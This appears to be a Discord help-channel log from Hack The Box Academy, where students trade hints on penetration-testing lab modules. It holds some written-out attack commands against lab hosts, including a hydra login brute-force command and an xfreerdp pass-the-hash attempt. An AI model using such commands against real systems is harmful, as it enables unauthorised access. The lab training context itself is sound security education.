Can anyone help me in mounting xxxxxxx.vhd file ? from the password attacks hard lab i tried this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 but did not work for me i receive this error https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 and i did not found any resource about it

Hey guys I'm stuck on "Windows Privilege Escalation" ==>> "Other Files"

trying to read the "plum.sqlite" according to the model but I can't make the "Set-ExecutionPolicy Bypass -Scope Process" command
any hints please ??
I stuck on this for to long ....

nmap scan is a whole lot slower on the virtual machines I noticed

I just did this one, the module tells you how to do it

@umbral fulcrum

like I did verbatim what the module said and it worked

that the thing I'm doing it as the module say but I get error massages. ...

is the error message you get that the scope is already unrestricted

I think we can post screens in here or you can dm me if you want

thxs!!

Anyone experience this issue when running the crackmapexec on their own machine?

nope

Anyone have issues with not being able to log in chat gpt in their virtual terminal?

i got two virtual machine connected into same network and i use NAT so how do i can make contact with one virtual machine to two virtual machine

i mean with webserver localhost/127.0.0.1

hello...everyone

through ipv4 but this isn't the right place to ask that, read #welcome and #rules

use poetry
https://www.crackmapexec.wiki/getting-started/installation/installation-on-unix

oh my bad thanks

Working on passwd, shadow and opasswd module and cant complete due to the following

I can only access the /etc/passwd file

the ones I need are not accessible without root

enumerate is key 😛

hint: hidden stuff on linux hosts

Yeah, I found the hidden stuff, thanks, just took me a minute

I was trying to follow the lesson, had to get creative instead

always and creative = funnier

I recall this took a while to crack since there are lots of possible passwords. Try choosing the service that you can run the most threads on and then splitting the mutated passwords into multiple files since it's quite a lot. The mutated password list I have has ||90,000+|| lines

DM me, I may be able to help. I just went through that same nonsense.

search "from: PNWAllstar" and look at my post for date/time — 11/01/2023 8:08 PM.

read from there and you'll figure it out. I went into a little detail on how I saved time instead of having to wait around forever. DM me if you need more assistance though.

You doing CPTS? If so I'm not too far ahead of you. Send a friend request if you want a study partner.

For pass-the-hash, where do I even start with this question? " Access the target machine using any Pass-the-Hash tool. Submit the contents of the file located at C:\pth.txt."

RDP?

Okay, so I was able to use the "password" as a hash

Question is misleading, the "password" is actually a hash to use with impacket-psexec

you can use a hash with xfreerdp

or any other tool you like

i did it with netexec for example

Check username and password. They are not correct

you sure winlogon is running on the system?

yes, i check in tasklist

try lsass and winlogon

okay, i am not sure but after Get-Process winlogon shouldn't you specify the id?

try Get-Process winlogon
i got 3 winlogon process, try all of these still not work

i mean you tried to use their ids right?

could you please show up tasklist also with them

yeah, it's correct

did you specify them in the above syntax?

instead of .id those pids

man, you didn't specify pid

yeah, weird

i got that

whats that

that was quick

yea already try but not work

ok will try again

After some rest I came to the conclusion: "Just because a user has rights over a group DOES NOT MEAN that they are in that group." So yeah, I'll try it out this afternoon and probs finish the last 2 questions.

thanks it work, i just missing double .

glad to read it

Bingo

Hi, I'm stuck on a question in the footprinting DNS module (What is the FQDN of the host where the last octet ends with "x.x.x.203"?), is it the right place to ask for help ?

Yes, you've come to the right place.
You have to find all the zones

I tried to brute force using about every hostname wordlist but I only targeted inlanefreight.htb, should I have looked for other domains?

This zone gives you all the data voluntarily. So why do you want to bruteforce it?

oh you're right, I was going in the wrong direction. I'm going to dig into zones more thoroughly and come back if I'm still stuck. Thanks for the guidance!

I am setting up my Burp Suite pro version which came with a tutorial video that how to set it up. I have also removed all old Java versions and installed the latest also it is not working. Can someone please help me with this?

Are you using burp's official documentation?

Thank you
Got the password 💪

LOGIN BRUTE FORCING --> skill assesment --> Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Hint: You may reuse the username you found earlier. Make sure you got the correct fail string and parameters.

Now I've tried the rockyou.txt and the lists made earlier in the module. No results i could use. What do i miss to get the correct fail string and parameters? Any nudge without too much spoiling?

No sir all files are provided by my institution.

Wouldn't be better if you have reached out to the person who wrote those at your institution

as he will be the one knowing how to install the tool

used command to brute force the first login page: ||hydra -l user -P /usr/share/wordlists/rockyou.txt 94.237.63.238 -s 45472 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"||

I am trying but response is very late

But if you are speaking, then I will try once more.😇

next time add which skill assessment you are on and hint you are missing a ||-|| somewhere in your fail string, double check everything by logging the request with burp

this is the doc for the install
https://portswigger.net/burp/documentation/desktop/getting-started/download-and-install
and this is the doc for some troubleshoot
https://portswigger.net/burp/documentation/desktop/troubleshooting

Thank you so much, sir. My professional Bup Suite has been Installed and set up successfully.

Hi Everyone,
Does anyone got tips how to get NORTON 360 to stop blocking scripts like sqlmap run on VM ( Virtual Box)

The fuck

Good morning everyone - is anyone able to help with the last question on WordPress - Discovery & Enumeration? I have found the plugin but can't find the version anywhere.

why'd you have norton installed in your vm in the first place lol

I dont have

To anyone stuck on this section - the hint is very helpful.

so it's installed in your host os?

Yes

AVs can't block stuff from running in a vm, the problem is something else

I'm not sure about this, I have seen Bitdefender blocking for instance SQLmap requests running in VMs

Hello

Is nothing sacred

if the traffic is sent through the academy vpn, I don't see how it can be examined by the AV

but if it's a problem, adding a whitelist to the vm ip should do it

Or is it just ne#

Hack the box must be down

have you performed local troubleshooting? that's the first step, rule out your network. I would alos move to #general for this type of discussion

Sure did

Something is wrong

Ah here we go

It wasn’t long but it was def sputtering

Sry thanks

Ok this site is def down

yeah

Someone needs to wake up lol

@rustic sage this isn't the place for that, read #welcome and #rules after that use /verify at #bot-commands and if you have questions about boxes ask that in #boxes and #general for general stuff like are boxes slow or is the site is down

Ok I have no further comments

Thank you

Sorry about that

Hello guys, how are you?
I'm trying to answer a question about the Web Proxy module:

Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you see the requests sent, what is the last line in the request?

Using Burp I was able to respond easily, but when I try to use ZAP the request doesn't even appear?
Can someone help me?

Screen shot ?

of what?

the Metasploit is configured correctly because I was able to capture the request with burp

The issue is with ZAP, I already researched and tried to resolve it but I couldn't

Screenshot of the proxy configuration (whichever tool or metasploit options you're using) and ZAP's proxy listener setting.

Yup

Does someone have a problem with the SQL part of "Attacking Common Services" ? I can't connect to the windows machine provided by HTB "Incorrect Password"

I wonder, do you have burp listener running on the same port as well?

If you opened Burp before ZAP and still have it running in the background. Your traffic are probably passed through Burp instead of ZAP.
Not sure if that's the case for you. Can you confirm.

Hi! Question for Module "INTRODUCTION TO MALWARE ANALYSIS" -> "Dynamic Analysis".

In the Module instructions is written the following:

1. Run Noriben via CMD ✅
2. This Opens ProcMon ✅
3. Execute the malware "shell.exe" by double clicking it ✅
4. There will be a popup by shell.exe that its terminating because of sandbox env recoginition ✅
5. Now i should terminate ProcMon and after that i should Control+C the Noriben CMD ✅
6. There should be a .txt file created by Noriben, but that isnt the case at my VM. (i got two error messages when terminating Noriben, see below) 🚫

Error Messages:

Anyone know what i am doing wrong?

Anyone I can DM about Client-Side Prototype Pollution?

After getting the answer with Burp, I closed it. I don't know if after closing it some daemon is running in the background, but at first, when I test with ZAP, Burp is closed

Apparently the request doesn't even want to go through ZAP because metasploit doesn't wait for a forword.

Well, if you closed the application, then I don't think the listener would still be in place. But, try a different port just so.

I already tried my friend, but thanks anyway

nvm just had to wait after terminating procmon a few seconds

It seems that some additional configuration in ZAP is necessary.

in the browser both work perfectly, the problem is when I use msfconsole, only Burp works with it.

and I don't know why lol

Optionally, you can try running metasploit with proxychains.

I see...

who can help me to finish xml langue in this module,thanks every bro https://academy.hackthebox.com/module/216/section/2300

is htb academy down?

While submitting an answer to a module question my access was blocked by Cloudflare. Can anyone see what happened?

Just got blocked as well.

Perhaps its just an issue on their side then

Cloudflare ended up blocking access to Discord earlier in the month.

For a lot of users.

I’m blocked

Hi, I'm blocked in the academy, I've just refreshed the page while the machine was launching cuz i have an error message box. What should I do?

What the hell is wrong with hack the box today my gosh

Jesus Christ

It's probably a Cloudflare issue.

You too? holy molly

They are gone to shit today

who can help me

a temporal problem maybe?

i come here for the same reason, nvm will pop back later

yea

me 2

Hello I was doing my exercises when suddenly ...

Same

i was very happy untill

😄

I'm having a deja vu kekw

i'm glad i though i was the only one lOL

yea, something wrong with htb today

I was almost done w this box too

Me too

It was rough had me sweating like Epstein in prison until..

it's time to go outside i guess

Hell no

dam thought i had finally shown signs of a certified pentester

Sun bad

Box good

ohhh fixed

i was doing sql injection, i thought it was only me)

can confirm fixed

yea

life is too short make sure you spend as much time as you can front of your PC

It's working now

https://tenor.com/view/frankenstein-its-alive-happy-excited-gif-5625959

Ugh

back to suffering i guess

For now

yap

It was bad an hour ago

Endless waiting to spawn

So that was a lie

dunno, it's working perfectly with me

I have a URL payload that executes XSS through Prototype Pollution on my end, but when I send it to the admin to report the URL, nothing happens. Any help? The challenge is Client-Side Prototype Pollution from the Whitebox Attacks module.

hey guys in module "Windows Privilege Escalation" ==>> "Pillaging" I can't move the "cookies.sqlite" file

any hints??

i really wish modules had videos, god knows i read slow

Anyone knows why i cant rename a subroutine in IDA during Malware Analysis (Module: Introduction to Malware Analysis).
I have the field open, but cant change anything (in the Module they just clicked "Rename" and say change it and enter)

my mom said hacking is bad and i cantg hack no moreeeeeeeeeeeeeeeeeeeeeee:((((((((((😭
https://tenor.com/view/sad-meme-gif-22168680

so bye forever

Enumerating SMTP, machine is unreachable on ping, nothing works. Reset machine twice, made sure I am connected to ovpn... Any ideas?

?

sent u a DM

Unfortunately there are no hacks to bypass parents 😦

Hi I am stuck in the password attack module password mutation section I need help please

This is what I did

Hi Guys, beginner here, in the web requests modules I'm a little confused as to what url we are exactly curling for the download.php file

Hello I have a problem here I recovered Jason's password but I can't connect via ssh with

Lowercase

Hi Assembly Question:

in the Module "Introduction to malware analysis" is written, that this function is giving the "ping" command a 5 second sleep timer.
When i google the command -n 5 it says, that its sending 5 pings.

So where is the 5 seconds sleep timer in that code i posted????

oh you should research what "ping -n 5 <ip>" does
or just try by yourself in a terminal.

No one is gonna wanna dm you without more specifics of what you've tried and what hasn't worked

esp for skill assessments

its sending 5 pings, 1 every second. But that is not a sleep timer for me. In the Module its written its doing a sleep duration of 5 seconds. But thats not the case if its only the command "ping -n 5 <ip>". Because then its active for 5 seconds and not sleeping. When we are doing that logic, the sleep timer would be active if the function is not executed, but that is not defined with 5 seconds, thats unknown.

So - thats not about HTB Module is wrong or something like that, dont wanna blame anybody. I just wanna know if i am wrong or if i dont see anything in the assembler code i posted that i should have seen to realize that its a 5 second sleep.

It looks like your mv command is missing a destination file operand ... reading is hard sometimes

You're also not adding the / after tmp to designate you are moving the file to a directory which is also part of the error

Hi i am stucked on this exrs:
Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

I have already tried where /R C:\ waldo.txt and where waldo.txt, that doesn't work

Which Module and Section?

INTRODUCTION TO WINDOWS COMMAND LINE
Finding Files and Directories

Did you connected to the TargetHost via SSH?

yes, I can't attach a screenshot here

If the explanation isn't right or could be better, suggest an edit on the module https://discord.com/channels/473760315293696010/858470491676737536

https://academy.hackthebox.com/achievement/1009496/147

Is anyone available to talk about the Admin path? I think I went the long way.

At ATTACKING WEB APPLICATIONS WITH FFUF module, I have added target machine IP and academy.htb to /etc/hosts, but I can't verify it by visiting academy.htb:<port from target machine> when I used my own connected VM by HTBA VPN or HTBA machine. What did I miss?

wdym xd

Just a hint. Assume i have a file called "MGM.png" on my Desktop.

To find it via command line, i would use the command
where /R C: MGM.png
(Important: There is a space between C: And MGM.png

What does this? It looks in C: and all Subfolders if there is a file called MGM.png

the '\' is not necessary

but it works with it

i dont know

I have tried it too, but still getting negative response. Could you connect to this station and check pls?

thx

Did you found your mistake?

yeah

solved, i removed IP PORT from /etc/hosts

Could get the ||PSSession|| stuff to work in evil-winrm, got to RDP to the box and from there I figured the rest out for the second to last question. Thanks for the nudge and all.

No worries. It was the most I could nudge without giving the actual answer.

Glad you figured it out

Hi im doing the web proxies module, i doing this question Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. I have loaded the payload and everything as it told me but the target i dont understand.
I did http://94.287.54.59:33851/§admin§/ but it didnt work and i tried like everything but i dont get how i choose where it is supposed to fuzz?

hey, anyone around to give me a hand on the command injection module's skill assessment? i feel like i've figured out the injection point and the operator, but i'm stuck trying to get /flag.txt to display and i'm not sure how to continue from here

i had a similar problem, swapping region helped my case

solved!

Password Attacks -Network Services

Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

I am able to login into the smbclient but the flat.txt file is blank am I missing something?

any context clues would be appreciated not looking to the answer but maybe a slap in the face lol

hi im doing web proxies atm, I dont get how i put the right target when im suposed to be in admin directory
i did http://94.287.54.59:33851/§admin§/ and tried every variation of this but i dont get how to do it right

Module: SQLMap Essentials
Session: Attack Tuning
Flag6 - Should I somehow be able to figure out what prefix to use? I get it from the Hint but I dont really get how I should know that that's the prefix to use?

do you mean flag.txt or flat.txt?

flag.txt my apologies

you can dm I just finished that module

hi, could you send the screenshot how it looks in your repeater)

Module broken Authentication:
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
I tried to modify the reset-token_time.py but still didnot get teh valid token. Anyone with modified script will be great or any help will be appreciated.

Normalize not calling hard boxes easy on HTB

Sounds like a skill issue. HTB boxes difficulty scale is different from other platforms

Easy is medium

Medium is hard

Depends

All relative

But also not the place to voice your complaints

Read #welcome to figure out how to gain access to more of the server

Ok dad

xd

you're talking about boxes in the academy chat my guy ¯_(ツ)_/¯

But I understand that reading comprehension may be hard for you

lol you don’t know who I am

And frankly my dear, I don't give a damn

We don’t need ad hom attacks

Then read #welcome and take your complaints to the proper channel lol

It's really that simple

Yo cut the fucking attitude

I got the point calm down

Nah I'm good

Genuine Module question : SMTP - trying to connect to SMTP as the academy suggested through ||telnet|| (only thing I saw in academy to connect) and connection won't work... Am I missing something? Tried ||telnet <ip> 25 and 581||

Is there any way to find what part of modules got updated? I’m doing the CPTS path and I see that several modules I’ve finished received updates.

https://academy.hackthebox.com/modules/changelog

hi im doing web proxies atm, I dont get how i put the right target when im suposed to be in admin directory
i did http://94.287.54.59:33851/§admin§/ and tried every variation of this but i dont get how to do it right

Should work with 25

Should I only need ||telnet <ip> 25?||

That's what's shown in the section yeah

Hello everyone! I've already learnt how to run the scp command

Module: Linux File Transfer Methods

Actually it works when I run it on my own machine to download and upload files but when I run it on the remote machine to transfer files it doesn't works!

I don't know why, could be because of SSL/TLS certificate
Is this normal or is there a way to make this works on the remote machine?
(Btw, I put 0.0.0.0 because the ssh server is listening on it)

Don't use 0.0.0.0, that's just shorthand for all interfaces

Also don't need ssh running on your system, the schema is scp source destination you can run it from your machine as long as there is ssh connection

Was doing the "Attacking Common Services" and under "Attacking SMB", the last question, I cant connect to ssh. Wondering if its htb or me. (I got the previous two questions correct and tried to ssh into the ip several times.

the SCP command is not going to work if you dont have port 22 as an open port right?

No, scp is not going to work if the target youre scp into doesnt have SSH service listening

port 22 is just the default ssh port

Could this 'python3 -m http.server' transfer comman work the port number 80 not being on your target machine as an open port?

you can specify a port with http.server

creating the service is what opens the port

you seem to have a misconception that ports and services are two seperate things

theyre not

how do i complie c# programs like sharpup on a linux machine everything i tried gives me an error

you do not

you would use visual studio

so i just transfer the exe over

yes

if you have a pre-compiled exe you can move it over using any available file transfer method ya

noob question what would be the easiest way to get it from host windows to vm kali transfer

i usually drag and drop

you can enable drag and drop in the vm settings

tried it i dont i have bidirectional turned on but dont work for me

you also can use smbserver.py

or if you plan to do this often you can setup a shared folder from your vm to your host

even a simple http server

do what fits you

prob look into fixing the drag and drop thing tho, that is pretty handy

yup

Hi everyone....

anyone who remember the ippsec video where he compress a file..!!!

I'm having issues to upload secretsdump.exe to a Windows machine

Anyone having issues with the password attacks passthehash (pth) lab?

xfreerdp is not working for the third question

Trying xfreerdp /v:<ip> /u:Administrator /p:30B3783CE2ABF1AF70F77D0660CF3453 /dynamic-resolution

getting